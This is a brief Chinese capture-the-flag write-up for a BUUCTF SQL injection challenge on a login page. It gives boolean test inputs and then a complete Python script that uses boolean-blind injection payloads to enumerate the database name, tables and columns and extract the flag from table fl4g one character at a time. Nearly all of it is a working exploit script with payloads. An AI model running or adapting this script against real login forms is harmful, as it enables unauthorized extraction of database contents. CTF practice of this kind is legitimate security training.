[第一章 web入门]SQL注入-2

[第一章 web入门]SQL注入-2

• bool盲注

访问name=admin’ or 1=1#
访问name=admin’ or 1=0#
发现页面回显不同

1=1

1=0

payload

import requests
import time
url = 'http://eb258849-cbb2-4dfa-9b41-b0a067c60d6b.node5.buuoj.cn:81/login.php'
flag = ''

for i in range(1, 1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # payload = f"1' or ascii(substr(database(),{i},1))>{mid}#"    #查库
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#"   #查表
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#"   #查列
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#"   #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }
        time.sleep(0.1)
        response = requests.post(url, data = data)
        if 'u6216' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)